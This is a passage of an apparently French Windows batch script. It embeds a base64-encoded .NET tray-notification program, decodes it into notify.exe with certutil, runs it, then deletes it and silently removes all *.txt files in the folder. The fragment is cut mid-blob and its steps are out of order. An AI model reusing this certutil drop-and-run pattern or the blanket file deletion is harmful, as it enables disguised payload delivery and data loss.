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pYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAdmFsdWUAbm90aWZ5LmV4ZQBzZXRfQ2xpZW50U2l6ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFN0cmluZwBkaXNwb3NpbmcAU3lzdGVtLkRyYXdpbmcAU3lzdGVtLkNvbXBvbmVudE1vZGVsAENvbnRyb2wAUHJvZ3JhbQBTeXN0ZW0ARm9ybQByZXNvdXJjZU1hbgBNYWluAG1haW4Ac2V0X0ljb24AVG9vbFRpcEljb24Ac2V0X0JhbGxvb25UaXBJY29uAE5vdGlmeUljb24AZ2V0X0FwcGxpY2F0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAHNldF9TdGFydFBvc2l0aW9uAEZvcm1TdGFydFBvc2l0aW9uAFJ1bgBDdWx0dXJlSW5mbwBTaG93QmFsbG9vblRpcABzZXRfU2hvd0luVGFza2JhcgBzZW5kZXIAZ2V0X1Jlc291cmNlTWFuYWdlcgBFdmVudEhhbmRsZXIAU3lzdGVtLkNvZGVEb20uQ29tcGlsZXIASUNvbnRhaW5lcgAuY3RvcgAuY2N0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SZXNvdXJjZXMAbm90aWZ5LkZvcm0xLnJlc291cmNlcwBub3RpZnkuUHJvcGVydGllcy5SZXNvdXJjZXMucmVzb3VyY2VzAERlYnVnZ2luZ01vZGVzAG5vdGlmeS5Qcm9wZXJ0aWVzAEVuYWJsZVZpc3VhbFN0eWxlcwBTZXR0aW5ncwBHZXRDb21tYW5kTGluZUFyZ3MARXZlbnRBcmdzAGFyZ3MAU3lzdGVtLldpbmRvd3MuRm9ybXMAU3lzdGVtSWNvbnMAY29tcG9uZW50cwBPYmplY3QAZ2V0X0RlZmF1bHQAU2V0Q29tcGF0aWJsZVRleHRSZW5kZXJpbmdEZWZhdWx0AEVudmlyb25tZW50AEluaXRpYWxpemVDb21wb25lbnQAU3VzcGVuZExheW91dABSZXN1bWVMYXlvdXQAc2V0X1RleHQAc2V0X0JhbGxvb25UaXBUZXh0AG5vdGlmeQBnZXRfQXNzZW1ibHkAc2V0X09wYWNpdHkAb3BfRXF1YWxpdHkAAAlJAG4AZgBvAAALRQByAHIAbwByAAAJTgBvAG4AZQAAD1cAYQByAG4AaQBuAGcAABduAG8AdABpAGYAeQBJAGMAbwBuADEAAAtGAG8AcgBtADEAADduAG8AdABpAGYAeQAuAFAAcgBvAHAAZQByAHQAaQBlAHMALgBSAGUAcwBvAHUAcgBjAGUAcwAAAAAApeaFwfzhS0OF69trsGQk2QAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFtBSABARF5BQcCHQ4IBAAAHQ4FAAICDg4GIAEBEYCFBQAAEoCNBiABARKAjQQAAQgOBSABARJFBSACAQgIBiABARGAoQQgAQENBiABARGApQUgAgEcGAYgAQESgKkDAAABBAABAQIFAAEBEkEEBwESZQgAARKAsRGAtQUgABKAuQcgAgEOEoC5CAABEoC9EoC9CLd6XFYZNOCJCLA/X38R1Qo6AwYSRQMGEkkDBhJlAwYSaQMGEhQGIAIBHBJRBQABAR0OBAAAEmUEAAASaQUAAQESaQQAABIUBAgAEmUECAASaQQIABIUCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAAAsBAAZub3RpZnkAAAUBAAAAACEBABxDb3B5cmlnaHQgwqkgRmxhbW1yb2NrICAyMDE2AAApAQAkYTEzODEyMWEtNTI3OC00Y2MxLTgxZjctZTkxZWQ0NmM2NWMzAAAMAQAHMS4wLjAuMAAATQEAHC5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC41LjIBAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lFC5ORVQgRnJhbWV3b3JrIDQuNS4yBAEAAABAAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyBzQuMC4wLjAAAFkBAEtNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLkVkaXRvcnMuU2V0dGluZ3NEZXNpZ25lci5TZXR0aW5nc1NpbmdsZUZpbGVHZW5lcmF0b3IIMTQuMC4wLjAAAAC0AAAAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAAAAAAAAAAAFBBRFBBRFC0AAAAtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3VyY2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAAAAAAADV5fhXAAAAAAIAAAAcAQAA+DMAAPgVAABSU0RTwlPkYyg2Kk6C9a/stomGyAEAAABjOlx1c2Vyc1xmbGFtbXJvY2tcZG9jdW1lbnRzXHZpc3VhbCBzdHVkaW8gMjAxNVxQcm9qZWN0c1xub3RpZnlcbm90aWZ5XG9ialxEZWJ1Z1xub3RpZnkucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADw1AAAAAAAAAAAAAFY1AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABINQAAAAAAAAAAAAAAAF9Db3JFeGVNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
echo;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
)> out.file
(certutil -f -decode "out.file" "notify.exe")>NUL
Del out.file>NUL
notify %1 %2 %3 %4 %5 %6
taskkill /f /im notify.exe
del /q notify.exe
attrib +h "notify.exe
del /q "*.txt"
call C:\users\%username%\desktop\find.bat

:reussi
del /q "verif.txt"

echo.la tache corbian s'est terminee sans erreur
@echo off

call :notify "corbian" " tache terminee sans erreur " " " Info 100
:Infinite & pause>nul & goto :Infinite
:notify
(
echo;TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANXl+FcAAAAAAAAAAOAAIgALATAAABYAAAAIAAAAAAAAZjUAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABQ1AABPAAAAAEAAALAFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADcMwAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAbBUAAAAgAAAAFgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAALAFAAAAQAAAAAYAAAAYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAHgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABINQAAAAAAAEgAAAACAAUAuCIAALQPAAADAAIABgAABmwyAABwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ4CKBQAAAoCKAUAAAYCFygVAAAKAhYoFgAACgIoAgAABgIoFwAACiobMAMAzQAAAAEAABEoGAAACgoCewIAAAQGF5pvGQAACgJ7AgAABAYZmm8aAAAKAnsCAAAEBhiabxsAAAoGGppyAQAAcCgcAAAKLA4CewIAAAQXbx0AAAorVQYamnILAABwKBwAAAosDgJ7AgAABBlvHQAACis4BhqachcAAHAoHAAACiwOAnsCAAAEFm8dAAAKKxsGGppyIQAAcCgcAAAKLAwCewIAAAQYbx0AAAoCewIAAAQoHgAACm8fAAAKBhuaKCAAAAoLAnsCAAAEB28hAAAK3gMm3gAqAAAAARAAAAAAsgAXyQADEwAAAQYqegMsEwJ7AQAABCwLAnsBAAAEbyIAAAoCAygjAAAKKgAAABMwAwCOAAAAAAAAAAJzJAAACn0BAAAEAgJ7AQAABHMlAAAKfQIAAAQCKCYAAAoCewIAAARyMQAAcG8ZAAAKAnsCAAAEF28nAAAKAh94FnMoAAAKKCkAAAoCckkAAHAoKgAACgIjAAAAAAAAAAAoKwAACgIXKCwAAAoCFygVAAAKAgL+BgMAAAZzLQAACiguAAAKAhYoLwAACipyAo5pGzIVKDAAAAoWKDEAAApzAQAABigyAAAKKh4CKDMAAAoqABMwAgAtAAAAAgAAEX4DAAAELSByVQAAcNAEAAACKDQAAApvNQAACnM2AAAKCgaAAwAABH4DAAAEKhp+BAAABCoeAoAEAAAEKhp+BQAABCoeAig3AAAKKlZzDAAABig4AAAKdAUAAAKABQAABCoAAABCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAA8BQAAI34AAKgFAADUBgAAI1N0cmluZ3MAAAAAfAwAAJAAAAAjVVMADA0AABAAAAAjR1VJRAAAABwNAACYAgAAI0Jsb2IAAAAAAAAAAgAAAVcVogEJAQAAAPoBMwAWAAABAAAALwAAAAUAAAAFAAAADQAAAAUAAAA4AAAAFgAAAAIAAAACAAAAAwAAAAQAAAABAAAABAAAAAIAAAAAACkDAQAAAAAABgCYAiMFBgAFAyMFBgCzAfEEDwCRBQAABgD0ATIEBgB7AjIEBgBcAjIEBgDsAjIEBgC4AjIEBgDRAjIEBgALAjIEBgDgAQQFBgBxAQQFBgA/AjIEBgAmAkMDCgCqA/AFDgDZBH0DCgDtA/AFBgAcBqMDBgDhBaMDBgBDAaMDDgB/AcEEBgCWAfEEBgBWASMFBgCkBEMFBgBsBB0EDgAOAX0DDgDHAX0DDgDiAAgECgAzAfAFBgBRBqMDBgBdA6MDCgDOA/AFEgAFBm4DEgDzA24DBgATAKMDBgBcAKMDDgDaBH0DCgCTA/AFEgA+A24DCgBWBPAFBgC0BKMDCgD8A/AFBgC1AKMDBgB0AKMDBgCzBjIEDgDtAAgEAAAAABkAAAAAAAEAAQABABAAAQCoBkEAAQABAIABEACbA6gGTQADAAYAAAAQAEoFoAVNAAMABwAAARAAxQWgBXUABQALAAEAEQbIAAEABwDMABEArwPQABEA0gDUABEATADYAFAgAAAAAIYY5AQGAAEAeCAAAAAAgQDAAwYAAQBkIQAAAACBACsA3AABAGYhAAAAAMQAAAEVAAMAiCEAAAAAgQBdBgYABAAiIgAAAACRALsD4wAEAD8iAAAAAIMY5AQGAAUASCIAAAAAkwigBOkABQCBIgAAAACTCLoA7gAFAIgiAAAAAJMIxgDzAAUAkCIAAAAAlggjBvkABgCXIgAAAACGGOQEBgAGAJ8iAAAAAJEY6gSCAAYAAAABAJkEAAACAEEDAAABAGQDAAABAOsFAAABACMDCQDkBAEAEQDkBAYAGQDkBAoAKQDkBBAAMQDkBBAAOQDkBBAAQQDkBBAASQDkBBAAUQDkBBAAWQDkBBAAYQDkBBUAaQDkBBAAcQDkBBAAeQDkBBAAqQDkBAYAsQDkBBoAuQDkBAYAwQDkBAYA4QDkBCAAgQDkBAYAgQAjASYAgQCHBBUAgQD6AAYA+QDOBTIAkQCMBhAAkQCVBhAAkQCYABAAAQHIBjcAkQDaAz0AEQH4A0QAkQDFA0oAIQEIAVEAkQB4BAEAKQEAAQYAgQAAARUAMQHkBAYAkQDkBFYAOQFxBgYAkQBoABUAQQHkBFwAgQA0A2IAOQGsABAAgQC8BmkAgQBEBG4AUQHkBHUAgQA2AHsAOQF/BhUAWQGyBYIAWQEvBoYAWQFoBIsAmQDkBAYAYQGGAJYAYQGvBp8AyQDkBKUA6QDkBAYAeQE/AK0AKQCbADUBLgALAA0BLgATABYBLgAbADUBLgAjAD4BLgArAEoBLgAzAEoBLgA7AEoBLgBDAD4BLgBLAFABLgBTAEoBLgBbAEoBLgBjAHIBLgBrAJwBLgBzAKkBSQCbADUBgwCDAPwBgwCLAPcBgwCTAPcBowCTAPcBowCDAD0CwAB7APcBLACRAAQAAQAFAAMAAACkBP4AAADaAAMBAABJBggBAgAIAAMAAgAJAAUAAQAKAAUAAgALAAcABIAAAAEAAAAAAAAAAAAAAAAAqAYAAAQAAAAAAAAAAAAAALYAIgAAAAAABAAAAAAAAAAAAAAAtgDwBQAAAAAEAAAAAAAAAAAAAAC2AKMDAAAAAAQAAAAAAAAAAAAAAL8AbgMAAAAAAAAAAAEAAABUBQAAuAAAAAEAAABrBQAAAAAAAABGb3JtMQBub3RpZnlJY29uMQBJbnQzMgA8TW9kdWxlPgBtc2NvcmxpYgBGb3JtMV9Mb2FkAGFkZF9Mb2FkAFN5bmNocm9uaXplZABkZWZhdWx0SW5zdGFuY2UASURpc3Bvc2FibGUAc2V0X1Zpc2libGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAc2V0X0JhbGxvb25UaXBUaXRsZQBzZXRfTmFtZQBUeXBlAGdldF9DdWx0dXJlAHNldF9DdWx0dXJlAHJlc291cmNlQ3VsdHVyZQBBcHBsaWNhdGlvblNldHRpbmdzQmFzZQBDbG9zZQBEaXNwb3NlAFBhcnNlAEVkaXRvckJyb3dzYWJsZVN0YXRlAHNldF9XaW5kb3dTdGF0ZQBGb3JtV2luZG93U3RhdGUAU1RBVGhyZWFkQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAdmFsdWUAbm90aWZ5LmV4ZQBzZXRfQ2xpZW50U2l6ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFN0cmluZwBkaXNwb3NpbmcAU3lzdGVtLkRyYXdpbmcAU3lzdGVtLkNvbXBvbmVudE1vZGVsAENvbnRyb2wAUHJvZ3JhbQBTeXN0ZW0ARm9ybQByZXNvdXJjZU1hbgBNYWluAG1haW4Ac2V0X0ljb24AVG9vbFRpcEljb24Ac2V0X0JhbGxvb25UaXBJY29uAE5vdGlmeUljb24AZ2V0X0FwcGxpY2F0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAHNldF9TdGFydFBvc2l0aW9uAEZvcm1TdGFydFBvc2l0aW9uAFJ1bgBDdWx0dXJlSW5mbwBTaG93QmFsbG9vblRpcABzZXRfU2hvd0luVGFza2JhcgBzZW5kZXIAZ2V0X1Jlc291cmNlTWFuYWdlcgBFdmVudEhhbmRsZXIAU3lzdGVtLkNvZGVEb20uQ29tcGlsZXIASUNvbnRhaW5lcgAuY3RvcgAuY2N0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SZXNvdXJjZXMAbm90aWZ5LkZvcm0xLnJlc291cmNlcwBub3RpZnkuUHJvcGVydGllcy5SZXNvdXJjZXMucmVzb3VyY2VzAERlYnVnZ2luZ01vZGVzAG5vdGlmeS5Qcm9wZXJ0aWVzAEVuYWJsZVZpc3VhbFN0eWxlcwBTZXR0aW5ncwBHZXRDb21tYW5kTGluZUFyZ3MARXZlbnRBcmdzAGFyZ3MAU3lzdGVtLldpbmRvd3MuRm9ybXMAU3lzdGVtSWNvbnMAY29tcG9uZW50cwBPYmplY3QAZ2V0X0RlZmF1bHQAU2V0Q29tcGF0aWJsZVRleHRSZW5kZXJpbmdEZWZhdWx0AEVudmlyb25tZW50AEluaXRpYWxpemVDb21wb25lbnQAU3VzcGVuZExheW91dABSZXN1bWVMYXlvdXQAc2V0X1RleHQAc2V0X0JhbGxvb25UaXBUZXh0AG5vdGlmeQBnZXRfQXNzZW1ibHkAc2V0X09wYWNpdHkAb3BfRXF1YWxpdHkAAAlJAG4AZgBvAAALRQByAHIAbwByAAAJTgBvAG4AZQAAD1cAYQByAG4AaQBuAGcAABduAG8AdABpAGYAeQBJAGMAbwBuADEAAAtGAG8AcgBtADEAADduAG8AdABpAGYAeQAuAFAAcgBvAHAAZQByAHQAaQBlAHMALgBSAGUAcwBvAHUAcgBjAGUAcwAAAAAApeaFwfzhS0OF69trsGQk2QAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFtBSABARF5BQcCHQ4IBAAAHQ4FAA